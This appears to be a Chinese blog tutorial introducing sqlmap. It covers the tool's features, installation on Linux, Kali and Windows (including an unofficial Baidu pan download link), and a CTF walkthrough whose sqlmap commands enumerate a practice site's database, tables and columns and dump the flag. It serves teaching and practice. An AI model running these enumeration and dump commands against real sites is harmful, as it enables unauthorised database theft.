[Second-图文]sqlmap的第一次注入{简介+安装+基础使用+拓展}
网安小手记-sqlmap简介(没有用的图片我就不上啦):
1.什么是sqlmap?
sqlmap是开源的自动化的SQL注入工具,编写语言为Python。Python支持为2.7,Python3暂不支持sqlmap。
sqlmap在linux和Windows下皆可运行。
完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。
完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。
在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。
支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。
支持自动识别密码哈希格式并通过字典**密码哈希。
支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。
支持在数据库管理系统中搜索指定的数据库名、表名或列名
当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。
当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持执行任意命令并回现标准输出。(来源-sqlmap中文用户手册)
2.sqlmap安装前提
Python2.7环境下运行-安装sqlmap必须配置好python2的环境。
一、sqlmap的安装(Linux)
linux(ubuntu)下有多种方式了,有人选择去官网(http://sqlmap.org/)下载然后
解压 sudo tar zxvf 下载的sqlmap压缩包
进入解压目录:./sqlmap.py
sqlmap.py -h测试安装。
另一种方式就是git了
先进入opt目录:cd /opt
安装git: apt-get install git 如果已安装可跳过……
安装sqlmap:git clone git://github.com/sqlmapproject/sqlmap.git
出现done就代表安装成功。
再就是Kali了。
Kali linux自己有sqlmap呀!输入sqlmap即可。
MAC下安装sqlmap请参考:http://www.mamicode.com/info-detail-1517275.html
二、Windows下安装sqlmap。
配置好python环境之后,下载sqlmap,不用去官网了,我提供一个地址:
https://pan.baidu.com/s/1I98uY-Z2f2TeQvnWw9Z9Tg
下载后直接将里面的sqlmap文件夹解压到python2根目录下
解压完成后,在桌面新建快捷方式。
下面就是我们建好的快捷方式了
再就是设置目录读取sqlmap.py
红圈标记改为sqlmap文件夹。
直接运行新建的快捷方式就可以了。sqlmap.py -h测试
下面就是sqlmap的基本使用了(从实验吧找一个简单的题目来讲解一下吧)。
http://ctf5.shiyanbar.com/8/index.php?id=1这是题目链接
当然,做sql注入手工注入还是要必须了解的,这里只专注于sqlmap,手工注入以后再更。
检测存在sql注入漏洞之后,下面就是 -u命令 u=URL
获取当前数据库--current-db
sqlmap.py -u http://ctf5.shiyanbar.com/8/index.php?id=1 --current-db
跑完之后发现当前数据库名为my_db
下面就开始爆库中的表名(已知数据库后可以用-D 数据库名 --tables来查看表)未知目标是双-哦
获取到两个表名,本题获取的是KEY,所以选择thiskey查看一下列信息(--columns)
sqlmap.py -u http://ctf5.shiyanbar.com/8/index.php?id=1 -D my_db -T thiskey --columns
发现k0y中的text,开始爆出k0y中的数据
sqlmap.py -u http://ctf5.shiyanbar.com/8/index.php?id=1 -D my_db -T thiskey -C k0y --dump
这就是我们想要的值了
本文仅提供基础使用,更多请访问http://www.kali.org.cn/forum-75-1.html(Kali中文网sqlmap相关)